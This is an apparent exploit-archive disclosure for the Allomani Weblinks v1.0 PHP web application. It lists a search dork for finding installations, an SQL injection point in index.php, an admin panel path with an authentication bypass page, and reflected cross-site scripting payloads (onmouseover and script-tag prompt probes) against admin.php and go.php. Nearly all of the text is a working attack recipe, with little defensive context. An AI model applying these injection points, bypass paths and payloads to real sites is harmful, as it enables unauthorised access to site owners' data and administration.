Allomani Weblinks v1.0 Multi Vulnerability
=====================================
Author :  indoushka
Vondor :  http://www.allomani.com/
Dork   :  جميع الحقوق محفوظة لـ : اللوماني © 2014
برمجة اللوماني للخدمات البرمجية © 2006 
======================================

Sql injection :

http://127.0.0.1/public_html/index.php?action=browse&cat=1 (inject her)

cpanel : http://127.0.0.1/public_html/admin.php

By Pass :

http://127.0.0.1/public_html/admin_menu.html

Cross site scripting (verified) :

Affected items
/public_html/admin.php 
/public_html/go.php 

URI was set to "onmouseover='prompt(929220)'bad=">
The input is reflected inside a tag parameter between double quotes.
URL encoded GET input id was set to 12'"()&%<ScRiPt >prompt(983476)</ScRiPt>